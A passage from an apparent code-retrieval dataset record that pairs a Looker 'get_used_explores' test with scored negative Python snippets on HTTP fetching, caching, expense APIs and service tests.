os.path.basename(path))\n with open(path, \"rb\") as file:\n return file.read(), True\n if save:\n return cls.fetch_and_save(url, path), False\n return cls.fetch_with_retry(url), False", "def retrieve(self, request, pk=None):\n\n try:\n expense = Expenses.objects.get(pk=pk)\n serializer = ExpenseSerializer(\n expense, context={'request': request})\n return Response(serializer.data)\n except Exception as ex:\n return HttpResponseServerError(ex)", "def call(url):\n result = requests.get(url)\n if 300 <= result.status_code < 400:\n raise TemporaryException\n if result.status_code == 429:\n raise ApiCountZeroException\n if 400 <= result.status_code < 600:\n raise PermanentException\n return result", "def make(self, method, extras=None):\n query = self.url_for_request(method, extras)\n logging.info(query)\n\n req = urllib2.Request(query)\n if self.shouldGzip:\n req.add_header('Accept-encoding', 'gzip')\n req.add_header('User-agent', 'Last.fm Explorer')\n\n result = { 'success' : False }\n\n max_retries = 2 \n attempt = 0\n\n while not result['success'] and attempt < max_retries:\n attempt += 1\n try:\n r = urllib2.urlopen(req, timeout=60).read()\n result['data'] = self.__unzip(r) if self.shouldGzip else r\n result['success'] = True\n if self.saveResponses:\n self.__save_response(method, extras, result['data'])\n\n except urllib2.HTTPError, e:\n logging.error(\"Requestor errored accessing \" + query + \" - \" + str(e.code))\n result['error'] = { 'code' : e.code, 'message' : e.msg }\n\n except urllib2.URLError, e:\n logging.error(\"Requestor failed to fetch \" + query + ' - URLError.')\n result['error'] = { 'message' : e.reason }\n\n except BadStatusLine:\n logging.error(\"Requestor caught BadStatusLine, attempt %d\" % (attempt,))\n result['error'] = { 'message' : \"Request gave BadStatusLine\" }\n\n except IOError, e:\n logging.error(\"Requestor caught IOError, attempt %d\" % (attempt,))\n result['error'] = { 'message' : \"Request gave IOError: \" + str(e) }\n\n except Exception as instance:\n logging.error(\"Requestor caught unknown exception for request \" + query + \" - \" + str(type(instance)))\n logging.error(traceback.format_exc())\n result['error'] = { 'messasge' : \"Unknown problem\" }\n\n return result", "def get(self, expense_id):\n url = base_url + expense_id\n resp = zoho_http_client.get(url, self.details, self.headers)\n return parser.get_expense(resp)", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n return articles", "def get_exchanges():\n url = 'https://help.yahoo.com/kb/finance-for-web/SLN2310.html?impressions=true'\n dataframes = pd.read_html(url)\n return dataframes[0]", "def fetch(self):\n raise NotImplementedError()", "def run(self):\n if self.parsed_args.fetch_cache:\n issues = self.backend.fetch_from_cache()\n else:\n issues = self.backend.fetch(from_date=self.from_date)\n\n try:\n for issue in issues:\n obj = json.dumps(issue, indent=4, sort_keys=True)\n # self.outfile.write(issue['url']+\"\\n\")\n self.outfile.write(obj)\n self.outfile.write('\\n')\n except requests.exceptions.HTTPError as e:\n raise requests.exceptions.HTTPError(str(e.response.json()))\n except IOError as e:\n raise RuntimeError(str(e))\n except Exception as e:\n if self.backend.cache:\n self.backend.cache.recover()\n raise RuntimeError(str(e))" ]
[ "0.79972434", "0.6808644", "0.64591634", "0.6081574", "0.6081095", "0.6056974", "0.5249449", "0.5153191", "0.5144307", "0.5057118", "0.49663934", "0.49415502", "0.4938596", "0.49360746", "0.49263144", "0.4916875", "0.49087682", "0.48916966", "0.48450214", "0.4824901", "0.48051685", "0.48000914", "0.47367904", "0.47179312", "0.46975544", "0.4694692", "0.46923035", "0.46534842", "0.46450973", "0.4628136", "0.4605014", "0.4594456", "0.4590412", "0.4589578", "0.45890552", "0.45690802", "0.45573905", "0.45546696", "0.45496222", "0.4543777", "0.45434904", "0.45431328", "0.45425966", "0.45409822", "0.453488", "0.45295477", "0.4517089", "0.4492424", "0.44917402", "0.44875965", "0.44847995", "0.44771248", "0.4473027", "0.44726917", "0.44699636", "0.44623104", "0.44604158", "0.4453867", "0.44537666", "0.44477496", "0.44441387", "0.44439906", "0.4438836", "0.4434277", "0.44338807", "0.44297993", "0.442709", "0.44267425", "0.44208613", "0.44143292", "0.44141978", "0.44061273", "0.44058302", "0.43878475", "0.43873137", "0.43865347", "0.43855476", "0.43845892", "0.43827713", "0.437795", "0.4377775", "0.437737", "0.43746188", "0.43728155", "0.43707606", "0.43695754", "0.4367101", "0.4364784", "0.436137", "0.4360388", "0.43603504", "0.43527612", "0.43492246", "0.43462956", "0.43451667", "0.43392137", "0.43331987", "0.43319952", "0.4330668", "0.43272278" ]
0.73947066
1
fetcher.get_used_explores() should return all used explores.
def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names): used_explores = fc.get_used_explores(model=test_model["name"]) assert isinstance(used_explores, dict) assert all(e in test_used_explore_names for e in used_explores)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def summarize_unused_offers(app_queue: Optional[MarathonQueueItem]) -> Dict[str, int]:\n unused_offers = get_app_queue_last_unused_offers(app_queue)\n reasons: Dict[str, int] = defaultdict(lambda: 0)\n for offer in unused_offers:\n for reason in offer[\"reason\"]:\n reasons[reason] += 1\n return reasons", "def get_usages(self):\n return self.client._perform_json(\"GET\", \"/projects/%s/managedfolders/%s/usages\" % (self.project_key, self.odb_id))", "def popular_items(self):\n if self._popular_items is None:\n self._popular_items = self._get_popular_items(100)\n return self._popular_items", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def unused_evals(self):\n\t\treturn self.Evals - self.nFES", "def get_low_use_instances(self):\n response = self.support.describe_trusted_advisor_check_result(checkId=LOW_USE_CHECK_ID, language='en')\n if 'result' in response:\n return response['result'].get('flaggedResources', [])", "def sitetotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalrequests\n\t\texcept Exception as e:\n\t\t\traise e", "def explores(self, explores):\n\n self._explores = explores", "def info_cache():\n return [custom_hit, custom_miss, len(custom_memory), total_custom_memory]", "def get_low_use_instances(self):\n return self.low_use.batch_get_item(EmailSent=True)", "def instances_used(self):\n return None", "def read_used():\n used_hashes = {\"evs\": set([]),\n \"cache\": set([]),\n \"seeds\": set([])}\n\n with open(LOG_FILEPATH, 'rb') as logfile:\n for line in logfile.readlines():\n kind, hash = tuple(line.split('...'))\n used_hashes[kind].add(hash.rstrip())\n\n return used_hashes", "def _get_global_popular_resources_uris(self,\n num_entries: int,\n resource_type: ResourceType = ResourceType.Table) -> List[str]:\n LOGGER.info('Querying global popular resources URIs')\n\n num_readers = app.config['POPULAR_RESOURCES_MINIMUM_READER_COUNT']\n\n relation_model = resource_relation_model[resource_type][UserResourceRel.read]\n res_key = f'{resource_type.name.lower()}_rk'\n res_attr = getattr(relation_model, res_key)\n user_attr = getattr(relation_model, 'user_rk')\n read_count_attr = getattr(relation_model, 'read_count')\n\n with self.client.create_session() as session:\n readers = func.count(user_attr).label('readers')\n usage_subquery = session.query(\n res_attr.label('res_key'),\n readers,\n func.sum(read_count_attr).label('total_reads')\n ).group_by(res_attr).having(readers >= num_readers).subquery()\n\n popular_usage = session.query(usage_subquery.c.res_key).order_by(\n (usage_subquery.c.readers * func.log(usage_subquery.c.total_reads)).desc()\n ).limit(num_entries).all()\n\n return [usage.res_key for usage in popular_usage]", "def form_expensive_list_goods(self): \n\n self.database.truncate_all_tables()\n\n self.database.add(GoodInfo(\"рыба мороженая, Кета 1кг\", \n \"400\", \"5\", \"2020-12-30\", \"90\", \"2020-12-30\"))\n \n most_expensive_test_list = self.database.get_all_goods()\n\n\n return most_expensive_test_list", "def test_tags_recently_used_count(self):\n\n po = self.catalog.load_pageobject('TagsPage')\n po.goto_page()\n tags = po.get_recently_used_tags()\n assert len(tags) <= 25, \\\n \"# tags is %s, which is greater than 25\" % (len(tags))", "def used_by(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n if 'used_by' in self.se.full_class_only_graph.nodes[self.uri]:\n response = self.se.full_class_only_graph.nodes[self.uri]['used_by']\n result = restructure_output(self,\n response,\n inspect.stack()[0][3],\n self.output_type)\n return result\n else:\n return []", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def test_collect_demands(self):\n pass", "def strategy_expensive(cookies, cps, history, time_left, build_info):\n print\n print \"STRATEGY PART BEGIN\"\n print\n items_available = []\n for item in build_info.build_items():\n items_available.append(item)\n while items_available:\n max_cost = 0\n for item in items_available:\n #print \"item:\", item, \", cost:\", build_info.get_cost(item)\n if build_info.get_cost(item) > max_cost:\n max_cost = build_info.get_cost(item)\n most_expensive = item\n print \"most expensive:\", most_expensive\n # check if time enough\n print \"checking time\"\n print \"time left:\", time_left\n print \"cost:\", max_cost\n print \"cookies can be produced:\", cps * time_left\n if cps * time_left + cookies < max_cost:\n items_available.remove(most_expensive)\n print \"not enough,\", most_expensive, \"removed\"\n print\n else:\n print most_expensive, \"chosen\"\n print \"STRATEGY PART END\"\n print\n return most_expensive", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def hits(self) :\n\t\ttry :\n\t\t\treturn self._hits\n\t\texcept Exception as e:\n\t\t\traise e", "def how_many_entries(URL):\n\treturn len(get_lottery_numbers(URL))", "def stats(self):\n return super(NoneCache, self).stats()", "def get_request_candidates(self):\n return os.listdir(self.cache_dir_)", "def get_popular_tickets_solution(tickets):\n popular_tickets = []\n for ticket in tickets:\n num_watchers = len(ticket['people']['watchers'])\n if num_watchers >= 8:\n popular_tickets.append(ticket)\n return popular_tickets", "def get_popular_tickets(tickets):\n popular_tickets = []\n #\n # TODO - your code here\n # \n for ticket in tickets:\n str_len=len(ticket['people']['watchers'])\n if str_len>=8:\n popular_tickets.append(ticket)\n \n return popular_tickets", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "async def get_aces_used(user_id):\n aces_used = ex.first_result(await ex.conn.fetchrow(\"SELECT acesused FROM blackjack.currentstatus WHERE userid = $1\", user_id))\n if aces_used is None:\n return []\n return aces_used.split(',')", "def get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def undefhits(self) :\n\t\ttry :\n\t\t\treturn self._undefhits\n\t\texcept Exception as e:\n\t\t\traise e", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def request_more_resources():\n logger.info(\"NEED MORE RESOURCES!!!!\")", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def list(self):\n path = \"authSettings/exemptedUrls\"\n return self._session.get(path)", "def get_possible_exploit(self):\n return 'exploit', self.exploit.run()", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def get_all(self):\r\n ret = []\r\n for cache_name, stat in self.stats_per_cache.items():\r\n ret.append({\r\n 'cache_name': cache_name,\r\n 'num_hits': len(stat.hit_targets),\r\n 'num_misses': len(stat.miss_targets),\r\n 'hits': stat.hit_targets,\r\n 'misses': stat.miss_targets\r\n })\r\n return ret", "def getDailyAvailableRequests(self):\n return self._dailyAvailableRequests", "def test_get_urls(self):\r\n OFFER_URLS = [\"http://olx.pl/offer1\",\r\n \"http://olx.pl/offer2\",\r\n \"http://olx.pl/offer3\",\r\n \"http://olx.pl/offer4\",\r\n \"http://olx.pl/offer5\",\r\n \"http://olx.pl/offer6\"]\r\n\r\n SEARCH_QUERY = \"http://SEARCH_QUERY_URL?\"\r\n \r\n for url in OfferSearcher.search(SEARCH_QUERY, 6, WebDocumentFetcherStub):\r\n self.assertTrue(url in OFFER_URLS, \"Unexpected offer url fetched: %s\" % url)\r\n OFFER_URLS.remove(url)\r\n \r\n self.assertEquals(0, len(OFFER_URLS), \"Not all offer urls fetched: %s\" % OFFER_URLS)", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def provides(self):\n provides = set()\n if self._retry is not None:\n provides.update(self._retry.provides)\n for item in self:\n provides.update(item.provides)\n return frozenset(provides)", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def get_free_games(self) -> List[Game]:", "def get_incomplete_exp_summaries(user_id):\n incomplete_exploration_ids = get_all_incomplete_exp_ids(user_id)\n\n number_deleted = 0\n for exploration_id in incomplete_exploration_ids:\n if not exp_services.does_exploration_exists(exploration_id):\n number_deleted = number_deleted + 1\n remove_exp_from_incomplete_list(user_id, exploration_id)\n\n return exp_services.get_exploration_summaries_matching_ids(\n incomplete_exploration_ids), number_deleted", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _get_personal_popular_resources_uris(self,\n num_entries: int,\n user_id: str,\n resource_type: ResourceType = ResourceType.Table) -> List[str]:\n LOGGER.info('Querying personal popular resources URIs')\n\n num_readers = app.config['POPULAR_RESOURCES_MINIMUM_READER_COUNT']\n\n relation_model = resource_relation_model[resource_type][UserResourceRel.read]\n res_key = f'{resource_type.name.lower()}_rk'\n res_attr = getattr(relation_model, res_key)\n user_attr = getattr(relation_model, 'user_rk')\n read_count_attr = getattr(relation_model, 'read_count')\n\n with self.client.create_session() as session:\n readers = func.count(user_attr).label('readers')\n\n usage_subquery = session.query(\n res_attr.label('res_key'),\n readers,\n func.sum(read_count_attr).label('total_reads')\n ).filter(\n user_attr == user_id\n ).group_by(res_attr).having(readers >= num_readers).subquery()\n\n popular_usage = session.query(usage_subquery.c.res_key).order_by(\n (usage_subquery.c.readers * func.log(usage_subquery.c.total_reads)).desc()\n ).limit(num_entries).all()\n\n return [usage.res_key for usage in popular_usage]", "def available_healpix_pixels(self):\n return [dataset.info['healpix_pixel'] for dataset in self._datasets]", "def get_app_queue_last_unused_offers(\n app_queue_item: Optional[MarathonQueueItem],\n) -> Sequence[Dict]:\n if app_queue_item is None:\n return []\n return app_queue_item.last_unused_offers", "def get_all_stats():\n\n return get_component(CachingPackage.COMPONENT_NAME).get_all_stats()", "def get_available_images():\n return AVAILABLE_IMAGES", "def sitetotalresponses(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalresponses\n\t\texcept Exception as e:\n\t\t\traise e", "def get(self) -> city_processor.CityOverheadTimes:\n with self._access_queue_lock:\n overhead_times = self._data_queue[0]\n del self._data_queue[0]\n print(\"element removed from the queue! Queue has %d elements left\" % len(self._data_queue))\n return overhead_times", "def checkRls():\n return api.rate_limit_status()['resources']['search']['/search/tweets']['remaining']", "def get_metric_list(config):\n metric_list = []\n url = config[\"OPENTSDB_URL\"] + \"/api/suggest?type=metrics&q=\"\n response = requests.get(url)\n if response.status_code == 200:\n metric_list = response.json()\n logger.debug(\"Get metric list from opentsdb: \" + str(metric_list))\n return metric_list", "def get_requests(self):\r\n\t\tself.last_processed = self.last_modified\r\n\t\treturn self.requests", "def get_kong_node_usage_metrics(opts):\n\n url = \"{0}/status\".format(opts['base_url'])\n\n r = requests.get(url)\n try:\n r.raise_for_status()\n except requests.exceptions.RequestException as e:\n logging.debug(\"http response body - %s\", r.text)\n logging.error(\"An exception occurred: (%s)\", e)\n sys.exit(2)\n\n print r.text\n\n return True", "async def get_ff_emotes():\n\n redis = await aioredis.create_redis_pool(REDIS)\n value = await redis.hgetall(\"ff_emotes\", encoding=\"utf-8\")\n\n redis.close()\n await redis.wait_closed()\n return value;", "def getEnergyConsumers(self):\n return self._EnergyConsumers", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def test_dos_list_service_huge_limit(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"limit\": attack_string, \"marker\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def get_techniques_used_by_malware():\n global techniques_used_by_malware\n \n if not techniques_used_by_malware:\n techniques_used_by_malware = rsh.techniques_used_by_malware(get_srcs())\n \n return techniques_used_by_malware", "def fetch_friendships(friendships, apis, users, excluded, out, target,\n save_frequency=15,\n friends_restricted_to=None,\n friendships_file=\"cache/friendships.json\") -> None:\n friendships.update(get_or_set(out / target / friendships_file, friendships))\n friends_restricted_to = friends_restricted_to if friends_restricted_to else users\n users_ids = set([str(user[\"id\"]) for user in friends_restricted_to])\n excluded = [s.lower() for s in get_or_set(excluded, [])]\n api_idx = 0\n for i, user in enumerate(users):\n if user[\"screen_name\"].lower() in excluded:\n continue\n if str(user[\"id\"]) in friendships:\n print(f\"[{len(friendships)}] @{user['screen_name']} found in cache.\")\n else:\n print(f\"[{len(friendships)}] Fetching friends of @{user['screen_name']}\")\n user_friends = []\n previous_cursor, next_cursor = 0, -1\n while previous_cursor != next_cursor and next_cursor != 0:\n try:\n new_user_friends, (previous_cursor, next_cursor) = apis[api_idx].get_friend_ids(user_id=user[\"id\"],\n stringify_ids=True,\n cursor=next_cursor)\n user_friends += new_user_friends\n except tweepy.TooManyRequests as e:\n api_idx = (api_idx + 1) % len(apis)\n print(f\"You reached the rate limit. Moving to next api: #{api_idx}\")\n sleep(15)\n except tweepy.TweepyException as e:\n print(f\"failed at api: #{api_idx}\")\n print(\"...but it failed. Error: {}\".format(e))\n user_friends = []\n break\n except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:\n print(e) # Why do I get these?\n sleep(5)\n\n common_friends = set(user_friends).intersection(users_ids)\n friendships[str(user[\"id\"])] = list(common_friends)\n # Write to file\n if i % save_frequency == 0:\n get_or_set(out / target / friendships_file, friendships.copy(), force=True)\n get_or_set(out / target / friendships_file, friendships.copy(), force=True)", "def get_etags(self,etagkey,headers):\n m = Memcache_Wrapper()\n\n etags_value = ['0']\n client_lastmodedate = \"\"\n\n hash_etagkey = etagkey+\"_etags\"\n hash_etagsvalue = m.get(hash_etagkey) # value from the cache\n\n last_mod_date_key = etagkey + \"_lastmoddate\"\n lastmoddate_value = m.get(last_mod_date_key) # value from the cache for lastmoddate\n\n # value from the header\n if 'If-None-Match' in headers:\n etags_value = [x.strip('\" ') for x in headers['If-None-Match'].split(',')]\n if 'If-Modified-Since' in headers:\n client_lastmodedate = str(datetime.datetime.strptime(headers['If-Modified-Since'],HTTP_DATE_FMT))\n if etags_value[0] == hash_etagsvalue and client_lastmodedate == lastmoddate_value:\n return True\n else:\n return False", "def likely_regressions(self):\n return set([label for label, count in self.regressions.items() if count == 0])", "def num_cached(self):\n return len(self._item_list)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def GetAllDifferentAmountOfCost():\n\n logs.logger.debug(\n \"Start to get back all different amount of \"\n \"Cost objects from database.\")\n try:\n ListOfAllDifferentAmountOfCost = []\n searchedCostsItems = GetAllAmountOfCost()\n for item in searchedCostsItems:\n if item not in ListOfAllDifferentAmountOfCost:\n ListOfAllDifferentAmountOfCost.append(item)\n logs.logger.info(\n \"Get back all different amount of Cost objects from database.\")\n return ListOfAllDifferentAmountOfCost\n except Exception as e:\n logs.logger.error(e, exc_info=True)", "def summarize(url: str, check_rate_limit: bool = True) -> Dict[str, Any]:\n try:\n split_url = urlsplit(url)\n if 'github.com' in split_url.hostname:\n return github_issue(url, check_rate_limit)\n elif 'stackoverflow.com' in split_url.hostname:\n return stackoverflow_question(url, check_rate_limit)\n except Exception:\n pass\n\n return {}", "def get_leds_used(self)->List[str]:\n leds = list()\n for group in self.LedGroups:\n leds.extend(group.Leds)\n return [str(led) for led in leds]", "def usage_metrics(self) -> Sequence['outputs.GetServiceQuotaUsageMetricResult']:\n return pulumi.get(self, \"usage_metrics\")", "def mymetrics(): \n _update_metric_counters()\n logging.debug(prom_objects_seen.collect())\n return flask.Response(generate_latest(), mimetype='text/plain')", "def get_devices_used_by(employee_id: int) -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT D.deviceID, D.manufacturer, D.modelNumber\n FROM Device D JOIN DeviceUsedBy DUB USING(deviceID) JOIN Employee E USING(empID)\n WHERE E.empid = %s\"\"\"\n cur.execute(sql, (employee_id,));\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n device_usedby = []\n for row in result:\n device_usedby.append(\n [row[0], row[1], row[2]]\n )\n return device_usedby\n\n except Exception as e:\n # If something went wrong, return an empty list\n print(\"ccc\")\n print(e)\n cur.close()\n conn.close()\n return []", "def gc_requests(self):\r\n\t\tnow = time.time()\r\n\t\tif (now - self.last_gc) > self.gc_interval: \r\n\t\t\tprint('now: {0}'.format(now))\r\n\t\t\tfor req in self.requests:\r\n\t\t\t\tprint('req.timestamp: {0}'.format(req.timestamp))\r\n\t\t\t\tprint('diff: {0}'.format(now - req.timestamp))\r\n\t\t\tlive = [req for req in self.requests if (now - req.timestamp) < self.max_request_refresh_interval]\r\n\t\t\tdead = [req for req in self.requests if (now - req.timestamp) >= self.max_request_refresh_interval]\r\n\r\n\t\t\tif len(dead):\r\n\t\t\t\tself.requests = live\r\n\t\t\t\tself.last_modified = now\r\n\r\n\t\t\tself.last_gc = time.time()", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def get_requests(self):\n\t\tself.last_processed = self.last_modified\n\t\treturn self.requests", "def get_scans_list(server_url, exp_no, return_list=False):\n if server_url.endswith('/') is False:\n server_url = '%s/' % server_url\n data_dir_url = '%sexp%d/Datafiles' % (server_url, exp_no)\n\n does_exist, raw_lines = check_url(data_dir_url, read_lines=True)\n if does_exist is False:\n return \"Experiment %d's URL %s cannot be found.\" % (exp_no, data_dir_url)\n\n # Scan through the index page\n scan_list = []\n header = 'HB3A_exp%04d_scan' % exp_no\n for line in raw_lines:\n if line.count(header) > 0:\n # try to find file HB3A_exp0123_scan6789.dat\n term = line.split(header)[1].split('.dat')[0]\n scan = int(term)\n # check\n if '%04d' % scan == term:\n scan_list.append(scan)\n # END_FOR\n scan_list = sorted(scan_list)\n if return_list is True:\n return scan_list\n\n message = 'Experiment %d: Scan from %d to %d' % (exp_no, scan_list[0], scan_list[-1])\n\n return message", "def get_total_weak_hosts(self):\n return len(self.weak_hosts)", "def get_leaks(self):\n _run_garbage_collection()\n\n remaining_objects = self._get_all_tracked_objects()\n remaining_objects = self._remove_initial_objects_from_list(remaining_objects)\n\n return remaining_objects", "def test_dos_list_service_huge_junk(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"junk\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def _not_exhausted(last_fetched):\n return len(last_fetched) == 100", "def retrieve_cached_decisions(self):\r\n return u.load_cached_data(self.decisions_cache_path)", "def get_free(self):\r\n\t\treturn len(self.free_objects)", "async def workers_to_close(self, target: int) -> list:\n # TODO, improve me with something that thinks about current load\n return list(self.observed)[target:]", "def gc_requests(self):\n\t\tnow = time.time()\n\t\tif (now - self.last_gc) > self.gc_interval: \n\t\t\tprint('now: {0}'.format(now))\n\t\t\tfor req in self.requests:\n\t\t\t\tprint('req.timestamp: {0}'.format(req.timestamp))\n\t\t\t\tprint('diff: {0}'.format(now - req.timestamp))\n\t\t\tlive = [req for req in self.requests if (now - req.timestamp) < self.max_request_refresh_interval]\n\t\t\tdead = [req for req in self.requests if (now - req.timestamp) >= self.max_request_refresh_interval]\n\n\t\t\tif len(dead):\n\t\t\t\tself.requests = live\n\t\t\t\tself.last_modified = 